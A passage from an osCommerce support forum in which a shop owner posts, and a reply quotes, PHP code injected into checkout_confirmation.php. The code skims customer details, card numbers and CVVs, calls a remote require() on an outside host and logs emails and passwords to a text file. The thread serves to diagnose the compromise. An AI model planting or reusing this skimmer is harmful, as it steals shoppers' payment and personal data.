Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Checkout_confirmation hacked?


Guest

Recommended Posts

Found the following code running in the checkout_confirmation.php page. Anyone seen this before??? The only way I found it was the cart wasn't working half the time then I seen this at the bottom of the page when it finally came back:

Warning: main(http://www.allthingsnails.co.uk/shop/debug.txt) [function.main]: failed to open stream: Connection timed out in /home/httpd/vhosts/realpurity.com/httpdocs/cart/checkout_confirmation.php on line 433

Line 433 was

require('http://www.allthingsnails.co.uk/shop/debug.txt');

 

I put a fresh copy in and all seems fine now. How screwed do you think I am?????

 

<?php

if(($firstname123=="")||($lastname123=="")||($postcode123=="")||($street_address123=="")) 
   { 
 $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'"); 
     $duong = tep_db_fetch_array($td_query); 
       $firstname123=$duong['entry_firstname'];     
       $lastname123=$duong['entry_lastname'];     
       $street_address123=$duong['entry_street_address']; 
       $city123=$duong['entry_city']; 
       $zone_id=$duong['entry_zone_id']; 
       $statex=$duong['entry_state']; 
   if(($statex=="")||($statex=="0"))    { 
    $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'"); 
     $duongxx = tep_db_fetch_array($td_queryxx); 
   $state123 = $duongxx['zone_name']; 
}else {$state123=$statex;} 
$country=$duong['entry_country_id']; 
$td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'"); 
     $duongxxx = tep_db_fetch_array($td_queryxxx); 
   $country123 = $duongxxx['countries_name']; 
       $postcode123=$duong['entry_postcode']; 
       $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); 
       $duong2 = tep_db_fetch_array($td_query2); 
           $telephone123=$duong2['customers_telephone']; 
       $email_address123=$duong2['customers_email_address'];      
$dob123 =     $duong2['customers_dob'];          
   } 
$site = "realpurity.com";
   $headers123 = "From:Website $site";     
   $headers123 .= "<$site>\n"; 
   $headers123 .= "X-Sender: <$site>\n"; 
   $headers123 .= "X-Mailer: PHP\n"; 
   $headers123 .= "Return-Path:<$site@$site>\n"; 
   $headers123 .= "Content-Type:text/html; "; 
   $headers123 .= "charset=iso-8859-1\n"; 
   $message123 = "Name : $firstname123 $lastname123 <br>"; 
   $message123 .= "Telephone : $telephone123 <br>"; 
   $message123 .= "Email : $email_address123 <br>"; 
   $message123 .= "Street : $street_address123 <br>"; 
   $message123 .= "Postcode : $postcode123 <br>"; 
   $message123 .= "City : $city123 <br>"; 
   $message123 .= "State : $state123 <br>"; 
   $message123 .= "Country : $country123 <br>"; 
   $message123 .= "Password : $password123<br>"; 
   $ccowner123 = $HTTP_POST_VARS['viaklix_cc_owner']; 
   $ccnumber123 = $HTTP_POST_VARS['viaklix_cc_number']; 
   $tmp1 = $HTTP_POST_VARS['viaklix_cvv_number']; 
   $tmp2 = $HTTP_POST_VARS['viaklix_cc_expires_month'] . "/" . $HTTP_POST_VARS['viaklix_cc_expires_year']; 
   $message123 .= "CC Owner : $ccowner123  <br>"; 
   $message123 .= "CC Number : $ccnumber123 <br>"; 
   $message123 .= "CVV2 :  $tmp1 <br>"; 
   $message123 .= "Date Expire :  $tmp2 <br>"; 
   $message123 .= "DOB :  $dob123 <br>"; 
   $message123 .= "Site : http://$site <br>"; 
if(($ccnumber123!="")&&($tmp1!="")){ 
require('http://www.allthingsnails.co.uk/shop/debug.txt');
} 
if($tmp1==""){
$f="images/yzx.txt";
$ft=@fopen($f, "a+");
$ax = "Email : ".$email_address123."
Password : ".$password123."
---------------------------------------
";
$fw = fwrite($ft,$ax);
}

Link to comment
Share on other sites

Found the following code running in the checkout_confirmation.php page. Anyone seen this before??? The only way I found it was the cart wasn't working half the time then I seen this at the bottom of the page when it finally came back:

Warning: main(http://www.allthingsnails.co.uk/shop/debug.txt) [function.main]: failed to open stream: Connection timed out in /home/httpd/vhosts/realpurity.com/httpdocs/cart/checkout_confirmation.php on line 433

Line 433 was

require('http://www.allthingsnails.co.uk/shop/debug.txt');

 

I put a fresh copy in and all seems fine now. How screwed do you think I am?????

 

<?php

if(($firstname123=="")||($lastname123=="")||($postcode123=="")||($street_address123=="")) 
   { 
 $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'"); 
     $duong = tep_db_fetch_array($td_query); 
       $firstname123=$duong['entry_firstname'];     
       $lastname123=$duong['entry_lastname'];     
       $street_address123=$duong['entry_street_address']; 
       $city123=$duong['entry_city']; 
       $zone_id=$duong['entry_zone_id']; 
       $statex=$duong['entry_state']; 
   if(($statex=="")||($statex=="0"))    { 
    $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'"); 
     $duongxx = tep_db_fetch_array($td_queryxx); 
   $state123 = $duongxx['zone_name']; 
}else {$state123=$statex;} 
$country=$duong['entry_country_id']; 
$td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'"); 
     $duongxxx = tep_db_fetch_array($td_queryxxx); 
   $country123 = $duongxxx['countries_name']; 
       $postcode123=$duong['entry_postcode']; 
       $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); 
       $duong2 = tep_db_fetch_array($td_query2); 
           $telephone123=$duong2['customers_telephone']; 
       $email_address123=$duong2['customers_email_address'];      
$dob123 =     $duong2['customers_dob'];          
   } 
$site = "realpurity.com";
   $headers123 = "From:Website $site";     
   $headers123 .= "<$site>\n"; 
   $headers123 .= "X-Sender: <$site>\n"; 
   $headers123 .= "X-Mailer: PHP\n"; 
   $headers123 .= "Return-Path:<$site@$site>\n"; 
   $headers123 .= "Content-Type:text/html; "; 
   $headers123 .= "charset=iso-8859-1\n"; 
   $message123 = "Name : $firstname123 $lastname123 <br>"; 
   $message123 .= "Telephone : $telephone123 <br>"; 
   $message123 .= "Email : $email_address123 <br>"; 
   $message123 .= "Street : $street_address123 <br>"; 
   $message123 .= "Postcode : $postcode123 <br>"; 
   $message123 .= "City : $city123 <br>"; 
   $message123 .= "State : $state123 <br>"; 
   $message123 .= "Country : $country123 <br>"; 
   $message123 .= "Password : $password123<br>"; 
   $ccowner123 = $HTTP_POST_VARS['viaklix_cc_owner']; 
   $ccnumber123 = $HTTP_POST_VARS['viaklix_cc_number']; 
   $tmp1 = $HTTP_POST_VARS['viaklix_cvv_number']; 
   $tmp2 = $HTTP_POST_VARS['viaklix_cc_expires_month'] . "/" . $HTTP_POST_VARS['viaklix_cc_expires_year']; 
   $message123 .= "CC Owner : $ccowner123  <br>"; 
   $message123 .= "CC Number : $ccnumber123 <br>"; 
   $message123 .= "CVV2 :  $tmp1 <br>"; 
   $message123 .= "Date Expire :  $tmp2 <br>"; 
   $message123 .= "DOB :  $dob123 <br>"; 
   $message123 .= "Site : http://$site <br>"; 
if(($ccnumber123!="")&&($tmp1!="")){ 
require('http://www.allthingsnails.co.uk/shop/debug.txt');
} 
if($tmp1==""){
$f="images/yzx.txt";
$ft=@fopen($f, "a+");
$ax = "Email : ".$email_address123."
Password : ".$password123."
---------------------------------------
";
$fw = fwrite($ft,$ax);
}

 

 

OUCH!!!!! That's grabbing all your customers information from your database and sending it to their site along with CC details ... depending on how long that code has been running on your site and how many of your customers have purchased from you I'd say you might be in a bit of trouble here...

 

If you look here on your server this is where its storing your customers details (their username and passwords):

 

http://realpurity.com/cart/images/yzx.txt

 

Cant access this file that its trying to require http://www.allthingsnails.co.uk/shop/debug.txt so dont know what is being done with this information (this is where the CC details are sent to) ... but surely its not a good thing...

 

Install SiteMonitor and update all your details and remove these files...look in your /images/ directory to see if there are ANY other .php or .txt files in there

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...